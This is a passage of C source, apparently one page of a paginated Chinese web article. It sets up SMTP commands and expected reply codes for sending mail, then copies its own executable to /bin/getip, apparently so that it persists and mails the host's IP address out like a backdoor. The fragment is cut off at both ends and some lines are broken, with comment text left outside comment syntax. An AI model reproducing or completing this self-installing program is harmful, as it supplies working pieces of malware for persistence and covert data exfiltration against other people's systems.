|
,"\n");
msg[PASS]=passwd;
msg[MAIL]="mail from:[email protected]\n";
msg[RCPT]="rcpt to:[email protected]\n";
msg[DATA]="data\n";
msg[QUIT]="quit\n";
n_return[EHLO]="250";
n_return[AUTH]="334";
n_return[USER]="334";
n_return[PASS]="235";
n_return[MAIL]="250";
n_return[RCPT]="250";
n_return[DATA]="354";
n_return[CONT]="250";
copy self to /bin/getip
if(strcmp(argv[0],"/bin/getip")!=0)// if file /bin/getip
is not existed,copy to it
{
if((f_open=fopen(argv[0],"rb")) ==NULL)//open self
{
perror("fopen argv[0] error");
return(-1);
}
if((f_write=fopen("/bin/getip","wb")) ==NULL)//open the
file which we will write 页码:[1] [2] [3] [4] [5] [6] [7] [8] [9] [10] 第3页、共10页 |